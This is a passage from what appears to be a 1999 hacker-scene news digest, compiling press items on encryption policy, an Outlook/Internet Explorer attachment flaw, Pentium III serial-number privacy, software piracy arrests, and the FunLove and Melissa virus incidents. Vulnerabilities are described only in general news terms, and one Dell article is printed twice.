fact of life and this is what makes encryption so important," he said.
"The problem in the UK is that our government is working with the US to
prevent UK citizens defending themselves using encryption," he said,
referring to the continuing use of export controls to hamper the
widespread availability of encryption products.
The NSA's current spy technology may be more advanced than
methods described in the patent because the application is more than
two years old. The US Patent Office approved the patent on 10 August
this year, but the NSA originally lodged the application on 15 April 1997.
The US Patent office keeps all applications secret until it issues a
patent.
@HWA
23.0 New Ezine and Web Site - PrivacyPlace Launches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
An online magazine, with news about privacy issues
updated on a daily basis, PrivacyPlace includes opinions,
advice, a forum for readers, an archive of articles on
privacy, and a marketplace that recommends products
and services available for protecting privacy. Future
content includes product and book reviews, a
developer's corner, and guides to encrypting e-mail and
surfing the web anonymously.
PrivacyPlace
http://www.privacyplace.com
Excite News
http://news.excite.com/news/bw/991112/ca-lumeria
'PrivacyPlace,' the Online Magazine for Personal Privacy, Launches First
Issue; PrivacyPlace.com Offers News, Opinion, Advice, Community and
Technology for Protecting Personal Privacy
Updated 6:03 AM ET November 12, 1999
BERKELEY, Calif. (BUSINESS WIRE) - PrivacyPlace, a new site designed to
offer individuals ways to protect their personal privacy, is now online at
www.privacyplace.com.
An online magazine, with news about privacy issues updated on a daily
basis, PrivacyPlace includes opinions, advice, a forum for readers, an
archive of articles on privacy, and a marketplace that recommends products
and services available for protecting privacy. Future content
includes product and book reviews, a developer's corner, and guides to
encrypting e-mail and surfing the web anonymously.
PrivacyPlace.com is an effort to give people the tools, the information,
and ideas on ways to protect their privacy.
PrivacyPlace Editor Tom Maddox is a science fiction writer, screenplay
writer (he has written two X Files scripts with coauthor William Gibson),
journalist, and essayist.
Maddox says PrivacyPlace aims to combine the creativity of a talented team
of writers with the power of the Internet to create a publication that is
lively, funny, insightful, and ultimately useful for anyone concerned with
personal privacy. His credo: "We believe in the power of each of us to
fight in our own lives for our privacy and in the social power of
concerted action."
Regular columnists for PrivacyPlace include Mike Godwin, former legal
counsel for the Electronic Frontier Foundation, and Jacques Francoeur, CEO
of The Privacy Gateway and expert in international privacy issues. In the
first issue, special contributor George Smith, editor of Crypt News
and longtime debunker of government myths about cryptography, writes about
the Moonlight Maze -- the Russian infowar attack that never was.
A regular feature includes the Nosy Parker Award, which is presented to
those who have egregiously trampled on personal privacy, and a regular
column from an anonymous character known as Paranoid Paul, who issues a
report from the road.
The Marketplace offers privacy-related software programs users can
purchase for immediate download. There's also an ever-growing library of
past articles on privacy, indexed by subject, and a Forum, where readers
can talk with each other, with writers at PrivacyPlace, and with the
editors.
PrivacyPlace is owned and operated by Lumeria Inc, an infomediary
incubator. Lumeria was founded in 1997 by former computer journalist and
industry analyst Fred Davis to provide technology solutions for the
personal management of information and knowledge. Fred Davis is also
the Editor-in-Chief of PrivacyPlace.
The publisher of PrivacyPlace is Colette McMullen, who also serves as
Lumeria's VP of Sales and Marketing. Before joining Lumeria, McMullen was
Group Publisher of IDG's Web Publishing group -- which includes Sun
World, Java World, and Linux World -- where she cofounded the first
profitable online publication.
Contact: PrivacyPlace Tom Maddox, 510/981-2215 editor@privacyplace.com or
Berkeley Ventures, Inc. Sylvia Paull, 510/526-5555 sylvia@weblust.com
24.0 Vendor Response Archive
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erik
Dragonmount Networks, in hoping to expose vendors
who put security on the back burner, and to salute
those who make it a priority, has launched the Vendor
Response Archive. The Vendor Response Archive hopes
to pressure software vendors to take security seriously.
If a vendor responds poorly to a problem, users should
know. Likewise, if a vendor responds quickly and
honestly, the vendor should be commended.
Dragonmount Networks
http://www.dragonmount.net/security/vra/index.htm
@HWA
25.0 Another from Cuartango: More Microsoft Security Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
Called the "Active Server Setup Security Loophole", this
glitch in Microsoft Outlook and Outlook Express can
download an e-mail attachment without the users
knowledge. The attachment has the capability to
access and delete files at will.
MSNBC
http://www.msnbc.com/news/335418.asp
MS bug opens door to your hard drive
Outlook, Outlook Express save temporary copy of file to disk when
you open attachment
By Bradley F. Shimmin
BUGNET
Nov. 15 � Forget for now about the BubbleBoy
Virus, which has yet to cause anyone harm.
There�s a real vulnerability lurking in Microsoft
Outlook and Outlook Express capable of
delivering your machine into malevolent hands.
DISCOVERED BY JUAN CARLOS GARCIA
CUARTANGO, the �Active Setup Control Security
Loophole� can download and save an e-mail-borne
attachment without your intervention or knowledge. Once
free to roam your hard drive, the attachment can access or
delete files at will.
(Note: Microsoft is a partner in MSNBC.)
What makes this vulnerability particularly scary is its
stealth. A hostile hacker could create an HTML e-mail
message attachment that masquerades as an innocuous
Cabinet (CAB) file. This is the file format Microsoft uses to
transport and store application code such as software
updates. The trick is that you don�t need to save such a
deceitful file to disk. By simply opening the attachment, both
e-mail applications save a temporary copy to disk. Code
embedded in the e-mail message can then execute this copy.
A malicious user could embed an unsafe executable
and disguise it as a safe attachment, so users following
normal security standards could think they are safe,�
explained Lisa Gurry, a Microsoft product manager for
Office. �The danger is someone could exploit it and create a
CAB that could do who knows what.�
Concerned users can quickly disable Active Scripting in
Outlook 2000 or Outlook Express as a temporary
workaround. This will prevent any embedded code from executing a
malicious CAB file that has already been written to
disk. Another workaround is to simply save
attachments to disk before opening them. The
unfriendly code in an e-mail message must
execute when the file attachment is opened in order to find
out where the temporary file has been created.
To fully quash this bug, Microsoft recommends a
software patch, which the company has made available from
its Security Advisor site. But it�s not for Outlook or Outlook
Express. �The vulnerability is in Internet Explorer,� said
Gurry. �It is an ActiveX control that ships as a part of
Explorer 4 and 5, yet Outlook and Outlook Express users are
affected by it.�
Microsoft's Active Setup Control Patch
The patch fixes a fault within the Active Setup ActiveX
control found within IE version 4.01 and above running on
both Intel and Alpha machines. It replaces a file called
INSENG.DLL with a file of the same name dated
10/26/1999. The new file requires that all CAB file
attachments (real or pretend) contain a valid digital signature.
Of course, a knave could still send a hostile attachment, but
the file�s signature would create a traceable fingerprint.
However, the patch only works on versions 4.01 running
Service Pack 2. If you�re running IE 4.01 with Service Pack
1 (or any earlier version of IE), Microsoft recommends that
you simply upgrade to a newer version before applying the
patch.
@HWA
26.0 DOD helps Local Cops in Fighting CyberCrime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
While the Department of Defense may be prohibited from
conducting local law enforcement they can advise or
assist local police agencies in other ways such as
grants, access to support services or systems, and
transfers of equipment or other assets. The GAO has
released a report detailing crime technology assistance
from DOD to local law enforcement agencies.
GAO
http://www.gao.gov/daybook/991115.htm
(Links to pdf files)
27.0 BSA Busts IRC Pirates
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
US Marshalls have reportedly seized five computers and
have executed several search warrants in Sacramento
and Downey, California, and Troy and West Bloomfield,
Michigan. The people arrested have been accused of
using the irc channel 'warez4cable' to trade copyrighted
software. The accused individuals could face up to
US$100,000 in fines for copyright infringement. BSA
claimed that the IRC channel has been shut down
(seems open right now, just +i) and that this case has
had a dramatic impact on online piracy. (Dramatic
impact? One channel out of thousands? Yeah, OK,
sure.)
Wired
http://www.wired.com/news/technology/0,1282,32616,00.html
Warez Chatters Busted: Piracy
by Wired News Report
3:45 p.m. 17.Nov.1999 PST
The Business Software Alliance is pressing charges against 25 people the
organization accuses of trafficking pirated software on the Internet.
US Marshals reportedly seized five computers and performed unannounced
searches in the homes of several of those accused of the pirating,
including residents of Sacramento and Downey, California, and Troy and
West Bloomfield, Michigan.
The accused individuals could face up to US$100,000 in fines for copyright
infringement, the BSA said.
The individuals were allegedly using a channel on Internet Relay Chat, a
real-time chat network commonly used by hackers and crackers to
communicate and plan their activities. The channel, called warez4cable,
has been shut down, according to the BSA, as well as several other
warez channels.
Warez refers to software that has been stripped of its copy-protection and
made available on the Internet for downloading.
The BSA said in a statement that the action against the warez users is
part of an initiative to "shut down illegal trafficking of software on the
Internet."
"We have seen an immediate impact on piracy in IRC channels as a result of
the lawsuit," BSA enforcement official Bob Kruger said. "BSA will continue
to fight piracy on the Internet to keep it a safe place for those who are
engaging in legitimate commerce."
@HWA
28.0 US Concerned About Chinese Statements
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
Recent posturing by the Chinese government about
information warfare has the US worried. The People's
Liberation Army has announced that it will gear up its
information warfare capabilities to rival that of it land,
sea and air forces. Vice Adm. Thomas Wilson, the new
director of the Defense Intelligence Agency (DIA) has
called the Chinese plans and there open discussion of
them unsettling. (Let the arms race begin.)
Washington Times
http://www.washingtontimes.com/news/news3.html
House OKs budget of $384 billion for '00
By Dave Boyer
THE WASHINGTON TIMES
he 106th Congress is wrapping up its first session with
Republican lawmakers trumpeting admittedly modest
spending achievements and Democrats bemoaning lost
opportunities for new regulations.
The House Thursday passed, 296-135, the final $384 billion
spending bill for fiscal 2000, while the Senate cleared the way
for a vote Friday. The measure calls for a 0.38 percent
across-the-board cut -- not including congressional salaries and
government entitlements.
House Speaker J. Dennis Hastert of Illinois, who worked
until 3:30 a.m. Thursday to complete the budget, said
Republicans can be proud of balancing the budget, saving Social
Security funds, increasing spending for education and defense
and passing a tax cut that
-- Continued from Front Page --
President Clinton vetoed.
"We did all of the things we set out to do," Mr. Hastert said.
"We've done the things that the American people wanted us to
do."
House Minority Leader Richard A. Gephardt of Missouri
said Congress accomplished little of importance. Mr. Gephardt
expressed disappointment that Congress did not ban "soft
money" in political campaigns, failed to pass gun regulations or a
minimum-wage increase, and did not enact a new benefit for
prescription drugs.
(Soft money is unlimited and largely unregulated donations.)
"We're leaving here without doing the things that people most
wanted us to do," Mr. Gephardt said.
Looking back, Democrats are happy about one thing that
Congress didn't do -- remove Mr. Clinton from office after his
impeachment last December. His trial in the Senate ended Feb.
12 without the necessary two-thirds vote to oust him.
Asked what he thought was Congress' single-biggest
achievement this year, Senate Minority Leader Tom Daschle
said, "In a strange sort of way, I think it's probably the
successful handling of the impeachment process. There was so
much riding on it."
While Congress may have put the impeachment behind it,
there is still a healthy dislike for the Clintons in evidence. Just
Thursday the House deleted from the budget a White House
request, championed by first lady Hillary Rodham Clinton, for $3
million for a music museum in New York, where she is
contemplating a run for the Senate.
Mr. Daschle said the Senate's defeat of the Comprehensive
Test Ban Treaty was the worst moment of the session, calling it
"an embarrassment to the country."
Republicans consider the vote important, saying the treaty
would have weakened the nation's defenses by throwing into
doubt the reliability of the U.S. nuclear stockpile.
From a fiscal perspective, Republicans ducked the reality
they are spending about 5 percent more in fiscal 2000 than last
year. They chose instead to focus on victories within the overall
budget, such as protecting Social Security funds from being used
for the general budget.
At a rally of House Republicans Thursday night after the
vote, Rep. Jennifer Dunn of Washington said the Social Security
issue will resonate with women.
"Women live longer than men, and yet they retire on fewer
dollars," Mrs. Dunn said. "The security in their lives will be there
when they get to retirement age."
Almost by accident, Republicans hit on a popular feature this
year that may become part of future budgets -- across-the-board
cuts aimed ostensibly at eliminating government waste and
fraud.
The idea was proposed earlier this year by Rep. John R.
Kasich, Ohio Republican and chairman of the House Budget
Committee, but was largely ignored until late in budget
negotiations when the GOP needed to save several billion dollars
to balance the budget. Mr. Clinton and congressional Democrats
fought a 1 percent cut but relented at 0.38 percent, and
Republicans are finding that constituents like the idea.
"It's very reasonable, it's fair and it's an effective
management tool," said Rep. Asa Hutchinson, Arkansas
Republican. "We'll come back and try it again next year."
Defense spending was a big reason for the overall budget
increase. After years of defense cuts under Mr. Clinton,
Congress this year appropriated $268 billion for the military --
about $17 billion more than last year and more than Mr. Clinton
requested.
"This year, we Republicans can be very proud that we took a
critical first step towards addressing the needs of our
long-ignored defense structure," said Rep. Tillie Fowler, Florida
Republican and a member of the Armed Services Committee.
House Majority Leader Dick Armey, Texas Republican, said
that in addition to increasing defense spending and reducing the
national debt by $130 billion, the Republican-led Congress
thwarted Mr. Clinton's proposals for more than 70 different tax
increases.
"All of those I think are reasons for us to be very pleased
with a good year's work," Mr. Armey told reporters.
With only a five-vote majority in the House, Republicans said
they had little choice this year but to compromise with the
administration on a variety of issues. Although overall spending
increased significantly, the GOP said it was victorious in
curtailing Mr. Clinton's budget priorities much more than last
year.
Said Sen. Paul Coverdell of Georgia, secretary of the Senate
Republican Conference, "The wonder to me is, given the limited
beachhead -- we've never had what you'd call a decisive
majority in the House, an organizational majority but not a
governing majority in the Senate, we don't have the presidency --
the wonder is we've come so far."
Although Republican lawmakers did give in to Mr. Clinton's
request to pay about $1 billion in U.N. dues, they won a
provision for which they had been fighting since 1994 --
restricting foreign aid from being used for family planning
services overseas.
"This seems to a lot of people like a small thing . . . but for
five years we tried to win on that issue, and this year we by and
large got Ronald Reagan's policy back into the law," Mr. Armey
said.
On education, although Republicans acquiesced to Mr.
Clinton's demand to continue funding his program to hire 100,000
teachers, the GOP won concessions from the White House to
funnel some of the money for teacher certification.
The Senate in October passed, for the third time in four
years, a ban on "partial birth" abortions, but again failed to
achieve enough votes to override Mr. Clinton's certain veto. The
House has yet to take up the issue.
@HWA
29.0 The state of the net in Bulgaria
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Zym0t1c
BRUSSELS | Nov 19 1999 - A hacker called g-RaX defaced both websites of our
Belgian State Council and our Treasury... g-RaX left some small notes
referring to our phone company (Belgacom), probably because of the high
internet prices, and to the famous Belgian writer Herman Brusselmans who has
been charged because he sort of insulted An Demeulemeester, a (great)
Belgian fashion designer, in his latest book. Screw them! I love his
books...
The point is that the State Council is not impressed by this burglary...
Both websites were hosted on stand-alone computers which weren't connected
at all with their internal network, so g-RaX formed no threats...
However, the State Council is pressing charges against g-RaX.
Belgian State Council: http://www.raadvst-consetat.be/
Belgian Treasury: http://treasury.fgov.be/
(Neither site was defaced at the time I received this email - Ed)
@HWA
30.0 More on the PIII chip ID
~~~~~~~~~~~~~~~~~~~~~~~~
http://www.heise.de/ct/english/99/05/news1/
Christian Persson
Pentium III serial number is soft switchable after all
Intels privacy strategy changed again
The controversial serial number of the new Pentium III processors can be
read on the quiet after all. Contrary to Intels description so far, the
system architecture allows for individual identification by software
tricks without a users explicit allowance or notice.
Intels new technique for securing E-Commerce transactions already caused
quite a stir as the Pentium III presentations approached. Privacy
advocates expected the readable serial number to act as a "permanent
cookie" and to produce the completely transparent surfer. The processor
manufacturer appeased with the guarantee, the user would have full control
whether he would allow the read-out of the serial number. Once switched
off, the corresponding processor command could not be activated until the
next cold start.
This description has proved wrong. The processor expert of c't magazine,
Andreas Stiller, has figured out a procedure to switch on the command for
reading out the serial number by software. This procedure is based on
specific features of the system architecture that are documented. They
would have got around in cracker circles sooner or later. A spokesperson
from Intel confirmed upon inquiry by c't, that the serial number can be
re-activated this way.
Intels solution is a renewed correction of announcements how privacy in
spite of the serial number could be guaranteed: whereas only a software
tool for switching the serial number on and off was intended so far, now
the PC manufacturers are encouraged to integrate the configuration of the
switching into the BIOS. This way, the switching on by software could be
prevented. Earlier Intel had rejected this method with the argument,
changes in the BIOS setup could not be expected from untrained users.
Intel said that the BIOS manufacturers had been informed correspondingly.
Also, they had been equipped with software samples. It remains to be seen,
how many manufacturers will be able to incorporate appropriate BIOS
functions into the first delivered Pentium III systems and how they are
configured by default. To top it all, the new privacy concept has holes,
too: after all, the BIOS setting has to be stored in the CMOS memory.
Someone who knows the respective BIOS very well can crack this, too. (as)
Addendum
The wording "A spokesperson from Intel confirmed upon inquiry by c't, that
the serial number can be re-activated this way" in the above text has been
taken as an acknowledgement, that the software developed by c't has been
checked by Intel. This is not the case. Actually, the spokesperson made a
statement about the procedure that c't described to an Intel specialist.
-=-
Software claims to undo Pentium III fix
By Michael Kanellos and Stephanie Miles
Staff Writers, CNET News.com
March 10, 1999, 6:30 p.m. PT
Canadian software developers say they have created a program that can
obtain the Pentium III processor serial number despite the privacy
protection measures taken recently by Intel.
Zero Knowledge Systems of Montreal said today that it has developed an
ActiveX control that can retrieve the serial number under certain
circumstances, even after a software repair released last month by Intel
has disabled the feature and ostensibly "hid" the number from prying eyes.
The Pentium III serial number has turned into a public-relations nightmare
for the world's largest chipmaker. Although Intel included the number in
the chip as a way to improve Internet security, it has drawn protests from
privacy advocates who say it provides hackers with an opportunity to obtain
sensitive information.
Zero Knowledge's control essentially exploits the approximate 15-second gap
between the time a Pentium III computer is turned on and exposes the
processor serial number and when the software repair kicks in and covers it
up.
The control tricks the computer into crashing. Then, as the machine is
rebooted, Zero's software grabs the number before the software utility has
a chance to disable it again.
"It simulates a crash and could be attached to a virus, hidden inside an
email attachment, shareware--anyway that people get hostile code onto your
machine," Zero Knowledge president Austin Hill said. The ActiveX control
grabs the serial code upon reboot, Hill said, and places it in a cookie
file that can be read by Web sites.
The Pentium III includes a serial code hardwired into the chip, along with
incremental improvements in speed and multimedia instructions.
Privacy and consumer rights groups are up in arms over the new feature,
which they say can provide an easy way for unscrupulous marketers and
hackers to track users based on their surfing habits. Some groups have
called for a boycott of Intel, while others, including the Center for
Democracy and Technology, the ACLU, and the Electronic Privacy Information
Center, are meeting with the FTC to pursue an investigation into the serial
code.
Intel included the feature as an additional security precaution for
e-commerce and to aid corporations tracking technology assets. The number
is "on," or can be read by a distant server, when the computer is turned
on. Intel has shipped a software utility to PC makers that turns the serial
code off.
For greater security, manufacturers can also disable the code in the BIOS,
or boot-up software. The BIOS patch hides the serial number at a much
earlier point in time.
In addition, Intel confirmed today that certain mobile Pentium II and
Celeron processors also contain the controversial serial code.
Zero's hack differs from German technology publication's proposed method of
getting around the disabling software utility reported earlier. The
magazine c't postulated that the serial code could be read upon awakening
from energy-saving "deep sleep" mode, Hill said.
Intel has not yet seen Zero's software utility, and declined to comment on
whether the hack actually disables the serial code utility. But as when c't
pointed out that the software utility could be bypassed, company spokesman
George Alfs noted that all software can be hacked. "We would want to look
at the code before we make a comment on that," Alfs said. "But the end user
always needs to be aware of malicious software."
Zero-Knowledge recommends that consumers make certain that the serial code
is disabled in the BIOS, Hill said. "Intel built the serial number and was
surprised by how seriously people take their privacy," Hill said. "They
said 'theoretically it may be broken'--it turns out it's not that
theoretical after all."
@HWA
31.0 Security Lawsuits Next After Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Fred Smith, an attorney at Panagakos and Wirth, Santa
Fe, N.M seems to think that lawsuits regarding software
security in e-commerce will be the next big thing after
Y2K. (Wonder how the Uniform Commercial Code that
exempts all software from any liability will figure into
these lawsuits.)
CMP Techweb
http://www.techweb.com/wire/story/TWB19991117S0005
Security Lawsuits To Replace Y2K Litigation
By Mary Mosquera, TechWeb
Nov 17, 1999 (8:13 AM)
URL: http://www.techweb.com/wire/story/TWB19991117S0005
Washington, D.C. -- Lawsuits involving computer security in e-commerce
will explode after Y2K litigation runs out of steam, which could be
quicker than originally believed. It appears that the deluge of Y2K
lawsuits will not happen because of legislation that protects companies
that share information about their Y2K vulnerabilities and limits on
litigation related to problems caused by Y2K computer glitches.
Instead, lawsuits may be in response to computer security guarantees that
failed or lapses in security within a network because some of those
responsible may not know enough, said Fred Smith, an attorney at Panagakos
and Wirth, Santa Fe, N.M. There may also be more typical fraud in
e-commerce, such as non-performance of contract, credit card fraud, or one
company falling victim to a fraudulent but seemingly legal virtual
venture, he said.
Speaking at the Computer Security Institute's conference here, Smith said
lawyers want to jump into the sphere of e-commerce litigation.
"But the legal process is not working," he said. "Developing new law won't
catch up with the speed of technology."
As a result, companies doing business online need to include as part of
their computer security plans the ability to collect digital evidence that
can be used to defend themselves to prosecute or to use if they are a
witness, said Mark Pollitt, chief of the FBI's computer analysis
response team.
But companies have no best practices or standards yet on which to develop
their network security. And the judicial system has no set of statutes
addressing problems particular to security in e-commerce, Smith said.
It is all new territory for companies to consider how secure they can make
their networks without privacy implications, how to collect digital
evidence that would be clear and stand up in court, and how to consider
other countries' laws since so much of e-commerce is global, Pollitt
said.
"Companies have to start thinking about being evidence gatherers and that
they will sue or be sued at some time," Smith said.
Evidence -- which may be e-mails, digital images, or a network security plan
-- must be able to be presented as a story in court so attorneys, judges,
and juries can understand, Smith said.
@HWA
32.0 Another Singaporean Cyber Intruder Pleads Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
18 year old Peng Yuan Han, an Anglo-Chinese Junior
College student, pleaded guilty to unauthorized use of a
computer service, unauthorized access and
modifications to a computer, and abetting unauthorized
access. He admits to having electronically broken into
the systems of the National Computer Board (NCB),
Ministry of Education (MOE) and Nanyang Technological
University (NTU). (It would be interesting to see what
would happen if someone actually plead innocent and
fought such a charge.)
The Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb1_1117.html
url not found - Ed
@HWA
33.0 SingCERT Releases Year to Date Stats
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
SingCERT has released statistics on the online threats
that have been reported to it up to October of this
year. They have reported over seventeen different
viruses infecting Singaporean users with over 400
victims from Chernobyl alone. 49 cases of illegal
scanning had been reported and 27 cases of
unauthorized intrusions. (Interesting but why are the
numbers so low?)
Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb2_1118.html
Straits Times - Yes, they had two stories
http://straitstimes.asia1.com.sg/cyb/cyb1_1118.html
wtf. urls not found again ... - Ed
@HWA
34.0 Canadian Telecom Firm Gets Security Clearance
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by cult hero
TMI Communications Inc. will be the first to offer
satellite telecommunications services in the U.S. market.
They have been granted approval after they agreed to
allow US law enforcement agencies to install wiretap
capability into their systems. The agreement came after
the US agencies agreed not to spy on Canadian
citizens.
Canoe
http://www.canoe.ca/MoneyNewsTechnology/sept13_tmisatellite.html
Monday, September 13, 1999
Technology News
TMI sets precedent with U.S. deal
Wins security clearance: Telecom firm
agrees to wiretaps -- but not on Canadians
By PETER MORTON
The Financial Post
WASHINGTON - A tiny Canadian satellite communications
company will be the first foreign firm to receive top security
approval from the FBI to operate a telecommunications
business in the United States after agreeing to allow U.S.
security agencies to wiretap its service.
The precedent-setting deal, to be signed today, will soon allow
TMI Communications Inc. to offer satellite telecommunications
services in the U.S. market, Larry Boisvert, TMI's chief
executive, confirmed in an interview.
"If you want to provide telecommunications in the U.S. you
have to be prepared to meet the security required as
determined by the FBI and the Department of Justice," Mr.
Boisvert said.
Even though it will operate the service from Canada, TMI
agreed to put a digital switch in the United States that would
give FBI and other U.S. security agencies the ability to listen in
on satellite calls or copy data, such as financial records, as
required by new federal laws that will force all U.S. mobile
communications companies to do the same by next June.
As first reported by the National Post in June, the FBI had
blocked TMI from getting a Federal Communications
Commission licence because it was worried that criminals or
terrorists would use foreign-based telecommunications
companies to avoid wiretaps. The FBI has complained it can
not easily tap phonecalls going through foreign countries.
The new agreement, which comes after 17 months of
negotiations, would put TMI's switch on U.S. soil, something
the FBI plans to demand of any other foreign telecom company
wanting to offer services in the United States as part of the
1994 Communications Assistance for Law Enforcement Act,
said Mr. Boisvert.
"It's going to cost us to do business in the U.S.," he said. "But
if you're going to play in someone else's market, you got to be
CALEA compliant."
A key part of the two agreements being signed today includes
one between Canada and the U.S. that prohibits the FBI and
any other security agency from tapping the calls being made by,
or to, Canadian citizens.
Ottawa had balked at giving the FBI blanket access, saying it
wanted to protect the privacy of Canadians.
Mr. Boisvert insisted the reason the negotiations took so long
was not because the U.S. government had security concerns
about Telesat or Canada. Rather, he said, the Department of
Justice was being extraordinarily careful because the TMI deal
would be the model for all other foreign telecommunications
companies wanting access to the U.S. market.
The United States and 130 other countries agreed in February
1997 to open their telecommunication markets to foreign
competition.
At the time, however, the United States insisted its security
concerns had to be met first, but did not spell out what that
meant until TMI became the first foreign telecommunications
company to apply for an FCC licence a year later.
"Security became the key issue," said Mr. Boisvert. "I suspect
this will be a surprise to a lot of others waiting behind us."
Besides TMI, which is owned by Telesat Canada Inc. and
BCE Inc., Globalstar Canada LP, a partnership of U.S.
Globalstar and Canadian Satellite Communications, is also
looking to offer U.S. telephone service using Canadian
facilities.
TMI is hoping to be the first out of the gate to not only offer
conventional satellite telephone services, but also to get into two
new areas in Canada and the United States -- one involving
data transmission and the second called asset management.
Mr. Boisvert said TMI is about to roll out the second service
in Canada. It essentially involves placing tiny transmitters on
everything from railway cars to trucks to allow companies to
know exactly where their goods are anywhere in the country.
In addition, TMI is talking to major U.S. utilities about
installing the devices in homes and businesses so they can
remotely track electricity use.
"You don't have to send someone to the home to read the
meters," he said. "The applications are enormous."
The deal being signed today clears the way for TMI to
receive an FCC licence after pledging to have the new security
features in place before next June.
The FCC was worried that demands by the FBI and the
Department of Justice would be so onerous that no foreign
telecommunications company would want to compete in the
U.S. market, something that could set the stage for retaliation
against U.S. companies around the world.
@HWA
35.0 Dell Gets Some FunLove
~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The production systems of Dell Computers's Limerick,
Ireland plant where infected with the FunLove virus
causing the plant to shut down for two days and a
recall of 12,000 systems. No viruses where later found
on customer systems.
Irish Times
http://www.ireland.com/newspaper/front//1999/1118/fro3.htm
Virus at Dell's Limerick plant costs firm millions s
By Madeleine Lyons and �ibhir Mulqueen
A virus in the production systems of computer giant Dell's
Limerick plant is understood to have cost the company millions
of pounds.
Work at the complex, which employs 3,400 people, was
suspended for at least two working days and 12,000 computer
units were recalled for checking.
The so-called FunLove virus was identified in Dell's production
process last Thursday afternoon. It was discovered in systems
used to install software in newly-built computers.
Production was shut down immediately and 12,000 units, which
the company calculated may have been affected, were recalled.
Dell builds computers to order and delivers them automatically
on completion.
According to a spokeswoman for Dell, only 500 units had
reached their final destination and each of the customers
involved was contacted by the company. These units - and the
remaining 11,500 computers in transit - were checked over the
weekend and all were found to be free of the virus. Normal
production resumed on Monday afternoon.
"When the virus was detected first, we had to take immediate
precautions to ensure the shipped units were not contaminated,"
the spokeswoman said.
Dell refused to put a figure on the cost of the disruption but one
industry source estimated that it may have cost as much as �14
million. The spokeswoman said production was not scheduled
over the weekend because the company had just completed its
latest quarter involving around the-clock operations.
Dell now plans to make up the lost production hours through
overtime and weekend work. According to the company, orders
placed for desktop computers since Monday will be delayed by
two days, while the estimated wait for other products is
expected to be slightly longer.
The FunLove virus infects both desktop computers and
computer servers running Windows 95, 98 and Windows NT
operating systems. As it spreads it increases the size of the files
it infects by placing a copy of itself at the end of the infected
file. When the file is opened under the basic operating system
DOS, it launches the message "Fun Loving Criminal".
Anti-virus companies said last week that FunLove would be
easy to control as long as standard anti-virus procedures were
implemented. Dell says it installed a "fix" early on Thursday and
the virus was detected in internal systems that afternoon.
A number of Irish companies took measures last week to
protect their computer systems against the same virus. They
included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the
Revenue Commissioners and Smurfit. Virus at Dell's Limerick
plant costs firm millions
By Madeleine Lyons and �ibhir Mulqueen
A virus in the production systems of computer giant Dell's
Limerick plant is understood to have cost the company millions
of pounds.
Work at the complex, which employs 3,400 people, was
suspended for at least two working days and 12,000 computer
units were recalled for checking.
The so-called FunLove virus was identified in Dell's production
process last Thursday afternoon. It was discovered in systems
used to install software in newly-built computers.
Production was shut down immediately and 12,000 units, which
the company calculated may have been affected, were recalled.
Dell builds computers to order and delivers them automatically
on completion.
According to a spokeswoman for Dell, only 500 units had
reached their final destination and each of the customers
involved was contacted by the company. These units - and the
remaining 11,500 computers in transit - were checked over the
weekend and all were found to be free of the virus. Normal
production resumed on Monday afternoon.
"When the virus was detected first, we had to take immediate
precautions to ensure the shipped units were not contaminated,"
the spokeswoman said.
Dell refused to put a figure on the cost of the disruption but one
industry source estimated that it may have cost as much as �14
million. The spokeswoman said production was not scheduled
over the weekend because the company had just completed its
latest quarter involving around the-clock operations.
Dell now plans to make up the lost production hours through
overtime and weekend work. According to the company, orders
placed for desktop computers since Monday will be delayed by
two days, while the estimated wait for other products is
expected to be slightly longer.
The FunLove virus infects both desktop computers and
computer servers running Windows 95, 98 and Windows NT
operating systems. As it spreads it increases the size of the files
it infects by placing a copy of itself at the end of the infected
file. When the file is opened under the basic operating system
DOS, it launches the message "Fun Loving Criminal".
Anti-virus companies said last week that FunLove would be
easy to control as long as standard anti-virus procedures were
implemented. Dell says it installed a "fix" early on Thursday and
the virus was detected in internal systems that afternoon.
A number of Irish companies took measures last week to
protect their computer systems against the same virus. They
included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the
Revenue Commissioners and Smurfit.
@HWA
36.0 Melissa Hits Disney
~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by turtlex
Melissa is still around wreaking havoc, this time it was
Disney Corporation. A variant of Melissa known as
Melissa.A infected an internal memo which it then
proceeded to mail out to the several members of the
press. Luckily the memo did not reveal any corporate
secrets, this time.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2396724,00.html?chkpt=zdhpnews01
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Spies hit Disney? No, just Melissa
By Rob Lemos, ZDNN
November 17, 1999 6:07 PM PT
URL:
The Melissa virus was behind an e-mail spam from Walt Disney Co. Wednesday.
Disney (NYSE: DIS) inadvertently spammed a host of press members with an internal memo,
because the Melissa.A virus, which had infected the memo, mailed out the attachment to a list of
people from the company's address book.
The memo -- from Disney Vice Chairman Sandy Litvack -- described
policy changes in the dates that employees (called "cast members" in
